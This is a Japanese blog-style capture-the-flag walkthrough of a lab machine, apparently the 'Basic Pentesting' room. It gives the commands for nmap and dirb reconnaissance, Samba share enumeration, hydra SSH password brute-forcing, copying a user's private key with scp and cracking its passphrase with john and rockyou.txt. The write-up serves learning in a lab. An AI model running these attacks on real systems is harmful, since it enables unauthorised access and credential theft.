Try Harder!!!
辞書攻撃
過去の漏洩パスワードでクラック
まずは、情報収集。
nmap
nmap でターゲットマシンの開いたポートの探索。
| nmapオプション | 意味 |
| -sV | サービスバージョンの特定。 |
| -Pn | IMCPリクエストを送信しないオプション。 (よくわかんね。) |
| -oN<ファイル名> | スキャン結果の保存 |
| -v | 進捗状況の表示 |
その他色々、オプションはあるみたい。
nmapの結果はこう。
# Nmap 7.98 scan initiated Mon Jan 5 13:27:23 2026 as: /usr/lib/nmap/nmap --privileged -sV -Pn -oN nmap.txt -v 10.49.145.108
Nmap scan report for 10.49.145.108
Host is up (0.26s latency).
Not shown: 994 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.13 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
139/tcp open netbios-ssn Samba smbd 4
445/tcp open netbios-ssn Samba smbd 4
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
8080/tcp open http Apache Tomcat 9.0.7
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Jan 5 13:27:41 2026 -- 1 IP address (1 host up) scanned in 17.77 seconds
わかること。
- http→WEBサイトが開いてる。
- ssh→ID、パスワードがあれば侵入可能性あり。
- Samba→フォルダの共有あり。
とりあえず。WEBサイト見よう。
結果。特に大きな情報なし。
dirb
$dirb http://<アドレス> <辞書>
2つ目の引数に辞書を選択。Kaliならこれ。
/usr/share/dirb/wordlists/small.txt
辞書で総当りし「/development/」が存在しアクセス可能状態である。
情報あるかもしれないので確認。
Sambaの共有フォルダに接続し情報を取得
使用コマンド
smbclient -L <アドレス>
-L はサーバ情報を取得するオプション
接続するには
smbclient \\\\<アドレス>\\<sharename>
接続後、lsなどで内部情報の取得。
気になるファイルはダウンロード
smb: \> get <ファイル名>
なんと、ここでスタッフの名前がわかりました。脆弱脆弱!
hydraで辞書攻撃
辞書攻撃を行うコード
hydra -l <user名> -P <辞書ファイル> ssh://<アドレス> -t 4
| オプション | 意味 |
| -l <user名> | 攻撃ターゲットの名前 |
| -P | 使用辞書ファイル(rockyou.txt等) |
| ssh://<アドレス> | ssh ログイン対象 |
| -t 4 | 並列処理数指定 |
これにより、ssh:<アドレス>におけるjanのパスワードが割れました。
sshに侵入し、ファイルを探し、それぞれの権限を確認すると秘密鍵が以下の場所より、読み取れた。
---/.ssh/id_rsa
sshから一度退出し、以下のコマンドを使用
scp <user>@<アドレス>:<ファイル指定> <宛先>
scpはファイル転送コマンド。
生のid_rsaの使用ステップ
- ロックされているためパスフレーズの特定
- chmod 600 でssh鍵を信用させる。
- 以下のコマンドでパスフレーズ付きSSH鍵をJohnクラックように変換
/usr/share/john/ssh2john.py id_rsa > sshkey.hash
ssh2john.pyがクラック形式に変換するスクリプト
- rockyou.txt でハッシュのクラック
john --wordlist=/usr/share/wordlists/rockyou.txt sshkey.hash
- ラストは秘密鍵とそのパスワードで上位権限アカウントに侵入
ssh -i id_rsa kay@<アドレス>
まとめ
まずは情報収集
権限の脆弱性をつく
上位権限を目指す。

コメント